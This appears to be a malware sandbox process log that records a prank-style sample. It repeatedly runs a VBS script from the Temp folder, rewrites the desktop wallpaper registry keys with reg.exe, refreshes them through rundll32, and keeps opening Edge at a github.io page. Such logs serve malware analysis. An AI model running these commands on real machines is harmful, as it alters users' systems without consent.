reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7452 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

